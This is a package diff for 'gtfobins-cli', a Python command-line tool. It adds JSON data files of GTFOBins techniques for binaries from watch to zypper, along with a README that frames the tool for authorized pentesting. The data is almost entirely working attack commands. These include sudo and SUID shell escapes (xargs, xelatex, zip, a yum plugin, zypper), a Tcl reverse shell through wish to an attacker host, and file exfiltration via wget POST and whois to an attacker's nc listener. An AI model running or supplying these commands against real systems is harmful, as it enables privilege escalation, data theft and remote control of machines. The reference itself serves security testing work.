gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/watch.json

@@ -0,0 +1,25 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This keeps the SUID privileges only if the '-x' option is present.",
+        "code": "./watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./watch 'reset; exec sh 1>&0 2>&0'"
+      }
+    ]
+  }
+}

gtfo/data/wc.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file content is parsed as a sequence of '\\x00' separated paths. On error the file content appears in a message, so this may not be suitable to read binary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "wc --files0-from \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./wc --files0-from \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo wc --files0-from \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/wget.json

@@ -0,0 +1,40 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use '--post-data' to send hard-coded data.",
+        "code": "wget --post-file=[file] [url]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The file to be read is treated as a list of URLs, one per line, which are actually fetched by 'wget'. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.",
+        "code": "wget -i [file]\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The data to be written is treated as a list of URLs, one per line, which are actually fetched by 'wget'. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.",
+        "code": "TF=$(mktemp)\necho [data] > $TF\nwget -i $TF -o [file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "wget [url] -O [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "./wget [url] -O [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "sudo wget [url] -O [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/whois.json

@@ -0,0 +1,25 @@
+{
+  "description": "'whois' hangs waiting for the remote peer to close the socket.",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send a text file to a TCP port. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. The file has a trailing '$'\\x0d\\x0a'' and its length is limited by the maximum size of arguments.",
+        "code": "whois -h [host] -p [port] \"`cat [file]`\"\n"
+      },
+      {
+        "description": "Send a binary file to a TCP port. Run 'nc -lp [port] | tr -d $'\\x0d' | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+        "code": "whois -h [host] -p [port] \"`base64 [file]`\"\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch remote text file from a remote TCP port. Run 'nc -lp [port] < [file]' on the attacker box to send the file. The file has instances of '$'\\x0d'' stripped.",
+        "code": "whois -h [host] -p [port] > [file]\n"
+      },
+      {
+        "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | nc -lp [port]' on the attacker box to send the file.",
+        "code": "whois -h [host] -p [port] | base64 -d > [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/wish.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "wish\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -lp [port]' on the attacker box to receive the shell.",
+        "code": "echo 'set s [socket [host] [port]];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo wish\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
+      }
+    ]
+  }
+}

gtfo/data/xargs.json

@@ -0,0 +1,35 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "GNU version only.",
+        "code": "xargs -a /dev/null sh"
+      },
+      {
+        "code": "echo x | xargs -Iy sh -c 'exec sh 0<&1'"
+      },
+      {
+        "description": "Read interactively from 'stdin'.",
+        "code": "xargs -Ix sh -c 'exec sh 0<&1'\nx^D^D\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This works as long as the file does not contain the NUL character, also a trailing '$'\\n'' is added. The actual '/bin/echo' command is executed. GNU version only.",
+        "code": "xargs -a [file] -0\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "GNU version only.",
+        "code": "./xargs -a /dev/null sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "GNU version only.",
+        "code": "sudo xargs -a /dev/null sh"
+      }
+    ]
+  }
+}

gtfo/data/xelatex.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "xelatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "xelatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "sudo xelatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+      },
+      {
+        "code": "sudo xelatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./xelatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ]
+  }
+}

gtfo/data/xetex.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ]
+  }
+}

gtfo/data/xmodmap.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by error prints.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "xmodmap -v [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./xmodmap -v [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo xmodmap -v [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/xmore.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file is displayed in a Xorg window, so it needs a working graphical environment.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "xmore [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./xmore [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo xmore [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/xxd.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        "code": "echo DATA | xxd | xxd -r - [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "xxd [file] | xxd -r\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./xxd [file] | xxd -r\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo xxd [file] | xxd -r\n"
+      }
+    ]
+  }
+}

gtfo/data/xz.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "xz -c \"[file]\" | xz -d\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./xz -c \"[file]\" | xz -d\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo xz -c \"[file]\" | xz -d\n"
+      }
+    ]
+  }
+}

gtfo/data/yelp.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "This spawns a graphical window containing the file content somehow corrupted by word wrapping, it might not be suitable to read arbitrary files. The path must be absolute.",
+        "code": "yelp \"man:[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/yum.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of '.rpm', the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in '/var/tmp', for example '/var/tmp/yum-root-cR0O4h/'.",
+        "code": "yum install http://[host]/[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "It runs commands using a specially crafted RPM package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF",
+        "code": "sudo yum localinstall -y x-1.0-1.noarch.rpm\n"
+      },
+      {
+        "description": "Spawn interactive root shell by loading a custom plugin.",
+        "code": "TF=$(mktemp -d)\ncat >$TF/x<<EOF\n[main]\nplugins=1\npluginpath=$TF\npluginconfpath=$TF\nEOF\n\ncat >$TF/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >$TF/y.py<<EOF\nimport os\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n  os.execl('/bin/sh','/bin/sh')\nEOF\n\nsudo yum -c $TF/x --enableplugin=y\n"
+      }
+    ]
+  }
+}

gtfo/data/zip.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "TF=$(mktemp -u)\nzip $TF [file]\nunzip -p $TF\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "TF=$(mktemp -u)\nzip $TF /etc/hosts -T -TT 'sh #'\nrm $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -u)\nsudo zip $TF /etc/hosts -T -TT 'sh #'\nsudo rm $TF\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "TF=$(mktemp -u)\n./zip $TF /etc/hosts -T -TT 'sh #'\nsudo rm $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/zsh.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "zsh -c 'echo \"$(<[file])\"'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "zsh -c 'echo [data] >[file]'\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "zsh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./zsh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo zsh"
+      }
+    ]
+  }
+}

gtfo/data/zsoelim.json

@@ -0,0 +1,20 @@
+{
+  "description": "The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "zsoelim \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./zsoelim \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo zsoelim \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/zypper.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This requires '/bin/sh' to be copied to '/usr/lib/zypper/commands/zypper-x' and this usually requires elevated privileges.",
+        "code": "zypper x\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\ncp /bin/sh $TF/zypper-x\nexport PATH=$TF:$PATH\nzypper x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This requires '/bin/sh' to be copied to '/usr/lib/zypper/commands/zypper-x' and this usually requires elevated privileges.",
+        "code": "sudo zypper x\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\ncp /bin/sh $TF/zypper-x\nsudo PATH=$TF:$PATH zypper x\n"
+      }
+    ]
+  }
+}

gtfobins_cli-1.0.0.dist-info/METADATA

@@ -0,0 +1,188 @@
+Metadata-Version: 2.4
+Name: gtfobins-cli
+Version: 1.0.0
+Summary: Command-line tool for GTFOBins - Unix binaries exploitation helper
+Home-page: https://github.com/t0thkr1s/gtfo
+Author: t0thkr1s
+Author-email: t0thkr1s <t0thkr1s@icloud.com>
+License: GPL-3.0
+Project-URL: Homepage, https://github.com/t0thkr1s/gtfo
+Project-URL: Repository, https://github.com/t0thkr1s/gtfo
+Project-URL: Issues, https://github.com/t0thkr1s/gtfo/issues
+Keywords: gtfobins,security,exploitation,privilege-escalation,pentesting
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Developers
+Classifier: Intended Audience :: System Administrators
+Classifier: Intended Audience :: Information Technology
+Classifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Topic :: Security
+Classifier: Topic :: System :: System Shells
+Classifier: Topic :: Utilities
+Requires-Python: >=3.6
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: colorama>=0.4.0
+Requires-Dist: pygments>=2.0.0
+Dynamic: author
+Dynamic: home-page
+Dynamic: license-file
+Dynamic: requires-python
+
+# GTFOBins CLI
+
+[![PyPI version](https://badge.fury.io/py/gtfobins-cli.svg)](https://badge.fury.io/py/gtfobins-cli)
+[![Python](https://img.shields.io/pypi/pyversions/gtfobins-cli.svg)](https://pypi.org/project/gtfobins-cli/)
+[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)
+[![Build and Publish](https://github.com/t0thkr1s/gtfo/actions/workflows/publish.yml/badge.svg)](https://github.com/t0thkr1s/gtfo/actions/workflows/publish.yml)
+
+## Overview
+
+**GTFOBins CLI** is a command-line interface for [GTFOBins](https://gtfobins.github.io/), providing instant access to Unix binary exploitation techniques. This tool helps security professionals and system administrators identify and understand how legitimate Unix binaries can be misused to bypass security restrictions.
+
+### Key Features
+
+- 🔍 **Quick Binary Lookup**: Search exploitation techniques for any Unix binary
+- 🎨 **Syntax Highlighting**: Color-coded output for better readability
+- 📦 **Offline Database**: No internet connection required
+- 🚀 **Instant Access**: Fast, local searches with zero latency
+- 💻 **Cross-Platform**: Works on Linux, macOS, and Windows
+
+## Installation
+
+### From PyPI (Recommended)
+
+```bash
+pip install gtfobins-cli
+```
+
+### From Source
+
+```bash
+git clone https://github.com/t0thkr1s/gtfo
+cd gtfo
+pip install -e .
+```
+
+## Usage
+
+### Basic Usage
+
+```bash
+gtfo <binary>
+```
+
+### Examples
+
+```bash
+# Search for sudo exploitation techniques
+gtfo sudo
+
+# Search for python exploitation techniques
+gtfo python
+
+# Check version
+gtfo --version
+```
+
+## Exploitation Categories
+
+The tool provides information about various exploitation techniques:
+
+- **Shell**: Spawn an interactive shell
+- **Command**: Execute system commands
+- **Reverse Shell**: Establish a reverse shell connection
+- **Non-interactive Reverse Shell**: Create a non-interactive reverse shell
+- **Bind Shell**: Set up a bind shell
+- **Non-interactive Bind Shell**: Create a non-interactive bind shell
+- **File Upload**: Transfer files to the target system
+- **File Download**: Extract files from the target system
+- **File Write**: Write data to files
+- **File Read**: Read file contents
+- **Library Load**: Load shared libraries
+- **SUID**: Exploit SUID permissions
+- **Sudo**: Exploit sudo permissions
+- **Capabilities**: Exploit Linux capabilities
+- **Limited SUID**: Work with limited SUID permissions
+
+## Screenshots
+
+<p align="center">
+  <img src="https://i.imgur.com/1EzFiGQ.png" width="45%" alt="GTFOBins CLI Screenshot 1">
+  &nbsp;&nbsp;&nbsp;&nbsp;
+  <img src="https://i.imgur.com/icgmDct.png" width="45%" alt="GTFOBins CLI Screenshot 2">
+</p>
+
+## Development
+
+### Setting up Development Environment
+
+```bash
+# Clone the repository
+git clone https://github.com/t0thkr1s/gtfo
+cd gtfo
+
+# Create virtual environment
+python -m venv venv
+source venv/bin/activate  # On Windows: venv\Scripts\activate
+
+# Install in development mode
+pip install -e .
+```
+
+### Running Tests
+
+```bash
+# Install test dependencies
+pip install pytest pytest-cov
+
+# Run tests
+pytest
+```
+
+## Contributing
+
+Contributions are welcome! Please feel free to submit a Pull Request. For major changes, please open an issue first to discuss what you would like to change.
+
+1. Fork the repository
+2. Create your feature branch (`git checkout -b feature/amazing-feature`)
+3. Commit your changes (`git commit -m 'Add some amazing feature'`)
+4. Push to the branch (`git push origin feature/amazing-feature`)
+5. Open a Pull Request
+
+## Credits
+
+- Binary exploitation data from [GTFOBins](https://gtfobins.github.io/)
+- Original GTFOBins project contributors
+- Created and maintained by [t0thkr1s](https://github.com/t0thkr1s)
+
+## Security Notice
+
+⚠️ **Important**: This tool is designed for authorized security testing and educational purposes only. Users must:
+
+- Only use this tool on systems they own or have explicit permission to test
+- Comply with all applicable laws and regulations
+- Understand that misuse of this tool may result in criminal charges
+
+The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
+
+## License
+
+This project is licensed under the GNU General Public License v3.0 - see the [LICENSE](LICENSE) file for details.
+
+## Support
+
+If you encounter any issues or have questions:
+
+- Open an [issue](https://github.com/t0thkr1s/gtfo/issues)
+- Check existing issues for solutions
+- Consult the [GTFOBins website](https://gtfobins.github.io/) for additional information